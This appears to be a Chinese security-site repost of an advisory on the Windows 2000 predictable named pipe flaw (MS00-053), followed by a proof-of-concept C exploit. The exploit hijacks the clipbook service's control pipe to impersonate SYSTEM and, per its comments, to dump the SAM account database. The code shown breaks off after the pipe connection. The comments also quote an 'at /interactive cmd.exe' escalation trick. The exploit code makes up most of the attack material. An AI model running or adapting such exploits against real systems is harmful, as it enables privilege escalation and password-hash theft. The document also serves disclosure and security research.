Microsoft Windows 2000可预测命名管道漏洞(MS00…
2008-04-09 04:31:42来源:互联网 阅读 ()
发布日期:2000-08-01
更新日期:2000-08-01
受影响系统:
Microsoft Windows 2000 Server描述:
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Advance Server
BUGTRAQ ID: 1535
CVE(CAN) ID: CVE-2000-0737
Microsoft Windows是微软发布的非常流行的操作系统。
服务控制管理器(services.exe)是Windows 2000提供的管理工具,允许创建或修改系统服务。SCM会在每个服务开始的时候创建命名管道。但是,如果恶意程序能够在服务启动前预测并创建特定服务的命名管道的话,就可以扮演该服务的权限。这可能允许攻击者以特定用户或本地系统权限运行恶意程序。
<*来源:Mike Schiffman (mike.schiffman@guardent.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=96524398014293&w=2
http://www.microsoft.com/technet/security/bulletin/MS00-053.asp
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* Proof of Concept
* Windows2000 services named pipe vulnerability
*
* Author: Maceo
*
* Compiled with MS VC 6.0 SP3
*
* Compiled and tested on:
* D:\>uname -sv
* Windows2000 5.0.2195
*
* Vulnerability: Windows 2000 uses predictable named
* pipe names for controlling services. Any user process
* can create a named pipe with the next name and force
* a service, they can start, to connect to the pipe. Once
* connected the user process can impersonate the service,
* which in most cases runs in the SYSTEM account.
*
* Proof of concept: This code abuses the clipbook service
* to run as the SYSTEM account and then dumps information
* from the local SAM database.
*
* This file is for educational purposes only. As many
* would agree, the default install of a W2K server is
* inherently insecure against interactive users. One
* does not have to dig very hard to find a way to
* elevate a users privileges when placed in an interactive
* situation, such as logged in at a console. For instance:
* D:\>time
* The current time is: 23:28:38.42
* D:\>at 23:29 /interactive cmd.exe
*
* It is with this in mind I release the following code.
*
* Disclaimer: This file is intended as proof of concept, and
* is not intended to be used for illegal purposes. The author
* does not accept responsibility for ANY damage incurred
* by the use of it.
*
*/
#include <stdio.h>
#include <windows.h>
#define ABUSE_SVC "clipbook"
#define SVC_KEY "SYSTEM\\CurrentControlSet\\Control\\ServiceCurrent"
#define SAM_KEY "SAM\\SAM\\Domains\\Account\\Users\\000001F4"
int main( )
{
HKEY hOpen;
DWORD dwNumber = 0;
DWORD dwType = REG_DWORD;
DWORD dwSize = sizeof(DWORD);
char szNetCmd[256];
// make sure the service we want to abuse is stopped. //
sprintf (szNetCmd, "net stop %s", ABUSE_SVC);
system (szNetCmd);
// open the current service number key //
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, SVC_KEY, 0, KEY_READ, &hOpen))
{
printf ("Failed to open key:\n %s\n", SVC_KEY);
return 1;
}
// read the key //
if (RegQueryValueEx (hOpen, "", NULL, &dwType, (BYTE *) &dwNumber, &dwSize))
{
RegCloseKey (hOpen);
printf ("Failed to read key:\n %s\n", SVC_KEY);
return 2;
}
// close the key //
RegCloseKey (hOpen);
// build the next named pipe name //
char szPipe[64];
sprintf(szPipe, "\\\\.\\pipe\\net\\NtControlPipe%lu", dwNumber);
// create the named pipe before scm can //
HANDLE hPipe = 0;
hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX,
PIPE_TYPE_MESSAGE|PIPE_WAIT,
2, 0, 0, 0, NULL);
if (hPipe == INVALID_HANDLE_VALUE)
{
printf ("Failed to create named pipe:\n %s\n", szPipe);
return 3;
}
// start the service we are going to abuse. //
sprintf(szNetCmd, "start /min net start %s", ABUSE_SVC);
system(szNetCmd);
// wait for the service to connect //
ConnectNamedPipe (hPipe, NULL);
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
